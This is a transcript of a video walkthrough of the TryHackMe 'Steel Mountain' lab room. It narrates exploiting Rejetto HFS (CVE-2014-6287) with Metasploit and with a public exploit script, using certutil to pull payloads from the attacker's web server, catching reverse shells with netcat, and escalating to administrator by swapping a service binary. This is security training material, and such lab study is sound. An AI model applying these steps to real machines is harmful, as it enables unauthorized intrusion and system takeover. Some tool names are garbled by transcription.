Welcome back everyone. In today's video we're going to cover the last room Steel Mountain in our basic computer exploitation module on TryHackMe. So in this Steel Mountain room we're going to enumerate a Windows machine, gain initial access with Metasploit, use PowerShell to further enumerate the machine, and then escalate our privileges to administrator. Let's go ahead and start the VM. So in this room, if you don't have the right security tools and environment, for example a Kali Linux instance, you can deploy the attack box and do it from there. But for this video, we're just going to utilize OpenVPN access. All right, now that we have our IP, let's go ahead and copy it. Open up a terminal. Let me zoom in real quick. Then you're going to run nmap-a-t4-pn-p- the IP, and then we can save the output to thm-steel mountain. So for the sake of time, I already ran Nmap, and let me go ahead and open that up for you guys. As you can see here, we have port 80 open, we have 135, 139, 445, 3389, 5985, 8080, and then all these RPC ports. Let's see what the question is. Who is the employee of the month? Let's go ahead and navigate to the different web pages. So it looks like we have a HTTP file server 2.3 running on 8080, and then we have a regular IIS version 8.5 running on port 80. Let's go ahead and grab this IP and then enter it in our URL. Hit enter. Employee of the month. So what we can do, if we don't know who this guy is, we can go ahead and just save the photo. So save image as, save it in our Steel Mountain folder. This might be the name, since the name of the image is Bill Harper. But just to double check, we're going to go to Google. Then we're going to do a reverse image search. So hit the images right up here. And then right over here, you want to hit this search by image, this little camera, and then we'll upload a file. So we'll go ahead and open this. And then it gives us a result saying Bill Harper. We can further this by searching, by hitting search. So by doing find image source, it shows us Bill Harper, Mr. Robot. So we're just going to go ahead and guess that it is Mr. Bill Harper. Enter his name here. And that's task 1 complete. So for task number 2, this is where we're going to gain initial access. Scan the machine with Nmap. What is the other port running a web server on? As we saw earlier, we do see port 8080 running HTTP file server version 2.3. So let's go ahead and navigate to port 8080. But first, let's go ahead and enter port 8080. And then let's go ahead and add port 8080 at the end. Back over here. Take a look at the other web server. What file server is running? So this is the default page. We see that we have a server. We have server information over here. So HTTP file server 2.3. Let's go ahead and copy that. Let's go to Google and then paste that over here. So we see there's an exploit displayed for the first result. So let's open that up. All right, so it looks like it's going to be the Rigetto HTTP file server. Let's go ahead and copy this over. Submit that. What is the CVE number to exploit this file server? So we can see the CVE number associated with this exploit. So we can just copy this. It's 2014-6287. Go ahead and paste that in there. Use Metasploit to gain an initial shell. What is the user flag? And let's go ahead and run MSF console to start Metasploit. Now that we have Metasploit loaded, we're going to search for that CVE. So we're just going to do a search 2014-6287. So it's going to show here exploit Windows HTTP Rigetto HFS execution. This is going to be a remote command execution for this VM. So let's go ahead and use 0 so we can specify the exploit. So we're going to use 0. No payload configuring, so it's going to default to Windows Interpreter Reverse TCP. We're okay with that. Let's do show options. And then let's go ahead and set the R host to the target IP, the R port to the target port, which will be port 8080, and then that should be it. Well, we will have, and then after that, we'll go ahead and set the L host, which will be our local IP. So the tunnel 0 adapter IP. We'll set our host to the IP of the machine 10.10.31.176. Set the R port, which is going to be 8080. That's what HFS is running on. And then let's set the L host to our local Kali IP on the tunnel 0 adapter, which we can find quickly with nconfig tunnel 0, which will be this IP right over here. So we'll go ahead and paste that, hit enter. That should be it. So let's go ahead and hit run. It may fail on the first time, so you may need to run this a few times just in case it fails the first time. So it looks like we have a shell. What is the user flag? So we'll go ahead and hit shell. And then let's navigate to users, see who the users are. So let's go to Bill. And then let's navigate to the desktop folder. And there we have it, user.txt. On to task number 3, privilege escalation. So from here, we're going to upgrade our privileges from Bill, the Bill standard user, to an admin user. So now that we have an initial shell on the Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root. But to enumerate this machine, we're going to use PowerUp. It's a PowerShell script, and basically it's going to scan the Windows VM and look for anything that may lead to a privilege escalation, any misconfigurations and whatnot. So we can download the script over here, so we can open that in a new tab. Then you'll hit raw. And then we'll just do a Control A to copy everything, and then do a Control C. Back in our terminal. And then we'll go ahead and just do a quick nano, and then PowerUp.ps1. We'll do Control V to paste the content from GitHub. Hit Control X, then Y to save it. And as we can see, this is our script right here. Perfect. All right, let's go back. Now that we have PowerUp, now we'll need to upload this to our Metasploit. So over here, we'll just do a quick exit. Go ahead and do a quick ls. So we don't have the PowerUp script here. We'll go ahead and hit upload PowerUp.ps1. Now it's uploading it. So if we do another ls, we'll see the PowerUp script right over here. So to execute this PowerUp script, we'll have to load PowerShell. So we'll go ahead and run load PowerShell to load the PowerShell extension. So it succeeded. Now we're going to run PowerShell shell to get the PowerShell shell. Say that 3 times fast. PowerShell shell. Now we spawned a PowerShell shell. So we'll go ahead and hit complete. So now we'll run PowerUp.ps1. So as we see, the PowerUp script is right here. We'll load it by running this command. And then from there, we'll do invoke all checks. Now it's going to run the script locally. While that's running, take close attention to the can restart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability? So if we can see can restart, that's false, false. This one's set to true, so this one can restart. What is the name of the service? So we'll try this. Advanced System Care Service 9. Let's go ahead and paste that here. Looks like that is our vulnerable service. So we'll just go ahead and run gedit notes to store it in our notes. So we'll paste that service name there. So with the can restart option being true, this will allow us to restart the service on the system and it is also writable, so we can replace the legitimate application, which we'll see in a bit, with this malicious one that we can craft using MSF-enum. So let's go ahead and use MSF-enum to generate a executable, the advanced.exe. So we'll go ahead and paste that here. Make sure the L host is correct. So 10, 13, 12, 138, that's correct. And then you can leave the L port as the 443. Go ahead and hit enter. And then upload your binary and replace the legitimate one. And after running ls, we see that the executable is right over here. And if we go back to the output of PowerUp of the service name that we found that's vulnerable, so we see that the path to the file or to the executable in question is this. So program files 86 IO bit and then advanced system care. So we'll go ahead and just copy this path right here. So let's go ahead and navigate to the path. So program files. So program files x86, put that in quotes. Now we see that we're in the program files directory. So let's go ahead and cd to IO bit. So in advanced system care right over here, this is what we're going to replace with our advanced.exe executable that we created, and we're going to rename it to this advanced system care directory also. So that way when we restart the service, it'll execute the malicious one, and then it'll drop us a root level or administrative level privilege cell. So let's go ahead and start up a web server real quick so we can download the advanced exe to our local directory here on our target machine. We do quick Python 3 -n for a module, and we'll start the HTTP server module, and then we'll listen on port 80. So now that's listening, we'll run cert util -url cache -f, and then the web server, which will be 10.13.12.138 on port 80, and then we're going to download the advanced.exe, and then we'll save it as advanced.exe. So we see that it ran a GET request and it pulled the advanced.exe from our current directory on our Kali machine, which the server is running on. And if we do a quick ls, we'll see that it is in fact in this server. So now we can just Control C to close our web server, and then we'll go ahead and stop the advanced system care service. So back on our terminal, we'll go here, copy, we'll go over here and copy, and then we'll go ahead and stop the service just in case it's running. So sc stop. Now we'll go ahead and copy the advanced.exe. Since we have write permissions, we'll go ahead and copy the advanced.exe, and we'll specify the output as advanced system care. So put that, so we'll have to put that in quotes. So advanced system care, copy, and that went through. So if we do a quick ls, we'll see that the advanced.exe was copied over to advanced system care. So now we're going to want to start a netcat listener on port 443, which is the L port that the advanced.exe to listen on. So go ahead and hit enter. And now we're going to want to start the service back up. First, we'll want to exit PowerShell and then load the shell back up. Go back to the directory, and then we'll navigate to program files. But first, let's put it in quotes: program files x86. And then we'll go ahead and cd to IO bit. And then now let's go ahead and copy over the advanced.exe to advanced system care. So we'll do copy advanced.exe to advanced system care. Overwrite advanced system care with advanced.exe. Yes. So now that we see it's been copied, we'll go ahead and run dir, and we'll see advanced.exe was copied to advanced system care. So now that we have our listener on port 443, let's go ahead and start the service. Let's go ahead and stop it. Let's go ahead and start it. We see that we do have a connection back on port 443. So now that we see it's a Windows System 32 shell, let's go ahead and navigate to Users, Administrator, and we're in the Administrator directory at the moment. So let's go to Desktop, and then we see root.txt, so we can run more or type to read out the contents. And that is our root shell. So let's go ahead and hit enter here. Let's go ahead and, yep, there we go, and complete. Let's complete all these. Perfect. Now that is the privilege escalation portion of Steel Mountain. So on task 4, now we're going to gain an initial shell and escalate our privileges without using Metasploit. So I went ahead and terminated the previous VM, and now we have a fresh instance of this VM. So now let's complete the room without the use of Metasploit. For this, we'll utilize PowerShell and WinPs to enumerate the system and collect the relevant information to escalate. So to begin, we shall be using the same CVE, however this time let's use this exploit. So this exploit will just be this one over here, the Rigetto HTTP file server that we found earlier, remote code execution or remote command execution. Let's go ahead and download. Now we see that the exploit downloaded, so let's go ahead and move it from our downloads folder to our current directory. So move downloads 39161.py, specify the period to copy it to our local directory. And for this one, we'll have to modify the contents of the file. So let's go ahead and use nano. Let's change the IP address to the local IP. So this is not our local IP, so we'll go ahead and change it to our tunnel 0 adapter IP, which would be 10.13.12.138. We can leave the local port, but I'll go ahead and change it to 4444. I'll go ahead and change it to 5555. So that's that for the payload, or that's that for the exploit. So note that you will need to have a web server and a netcat listener active at the same time in order for this to work. So we'll have to copy over the netcat binary from GitHub, so we can use this link over here. And then we can just download it locally. So let's go ahead and hit download. It'll download it into our downloads folder. So let's go ahead and move it to our current directory. And then we'll go ahead and rename it to nc.exe. And then we'll need to run this exploit twice. As mentioned, the first time this will pull our netcat binary to the system, and the second time we'll execute the payload to gain a callback. So we'll need to split our shell, and let's go ahead and start the listener on port 80. And this will be used to grab the netcat executable. And now we're going to want to start our listener, which was on port 5555. Go ahead and split the shell again. Now we're going to want to run the exploit. So Python 239.169, the IP of the machine, and then the port that the NFS is running on. So go ahead and hit enter. On our web server, we see that it grabbed the netcat executable. So let's go ahead and run it again. So hit the up arrow, run it again, and we should gain a shell. Now we see over here that we did get a shell. Let's see who we are. So we'll run a quick who am I. So we're Bill. Let's go ahead and come back to the TryHackMe page. Let's go ahead and hit complete. We gained a shell. Now we're onto the system. Now we can pull WinPs to the system using PowerShell-C. So what PowerShell-C command can we run to manually find out the service name? So what PowerShell-C command could we run to manually find out the service name? It would be PowerShell-C and then get-service. Now let's escalate to administrator with our newfound knowledge, generate our payload using MS@Venom, which we can use the same payload from earlier. And for those of you looking to download WinPs, you could do a quick Google search. So we can go ahead and run system info to find out what architecture type this Windows machine is running on. So we see that it is a 64-bit architect. So now we know what version of WinPeas to download. To save time, I already downloaded WinPeas. So we'll go ahead and start our web server back up on port 80. For simplicity reasons, we'll go ahead and navigate to the root directory. And we see that this is the contents of the root directory of C. So for ease, I like to create a temp directory to put everything in. That way I have full privileges in this directory. And then we'll go ahead and run cert util-url cache-f, and we'll specify our web server http://10.13.12.138 on port 80, and then we'll want to specify the name of the WinPeas file, which will be WinPeas x64, and then we'll go ahead and save it as WinPeas x64.exe. We see the GET request, and we see it in our temp directory. So now we want to run it just by typing the executable out. That'll do its thing. So you'll know when P's ran when you see this little P right here. And then you can scroll through the output. So red indicates a special privilege escalation or something that is misconfigured. Anything red is what we like to look for. Okay, so scrolling through, we see that we found auto logon credentials for Bill. So it looks like this is the default password for Bill. Unfortunately, it's not going to be much use to us unless we want to RDP to the target VM, but we'll keep scrolling. So scrolling through, we find the same DLL hijacking from earlier with the unquoted service path. So it looks like it's the same service with the same path. So let's go ahead and use the same payload that we generated using MSF Venom, and let's upload it here in our temp directory. This web server is still running. Let's go ahead and pull our advanced.exe executable that we generated in the previous task. So let's go ahead and navigate to our program files. So cd quote program files x86, and let's go cd to iobit. Now that we're in here, let's run cert util-url cache-f http, and then the web server IP 80 advanced.exe advanced.exe. Alright, so we downloaded it directly to our program files x86 iobit. So let's go ahead and stop the service by running sc stop advanced system care service 9, just in case it's running. Okay, perfect. Now we'll want to copy over advanced.exe over to advanced system care. Go ahead and hit enter. And we see that we got a one file copied. So if we run dir, we'll see that advanced system care is there. So let's go ahead and run our netcat listener on port 4443, which is what we specified in the MS Venom. And then let's go ahead and start the service. So sc start, and then the service name. And as we can see, we got a shellback. So let's go to cd users, administrator, desktop, and there is our root.txt file. And that is it. That is, in this box, we learned how to gain initial access with Metasploit and without Metasploit, which is my preferred method. Thank you for watching, everyone. I hope you all enjoyed this series.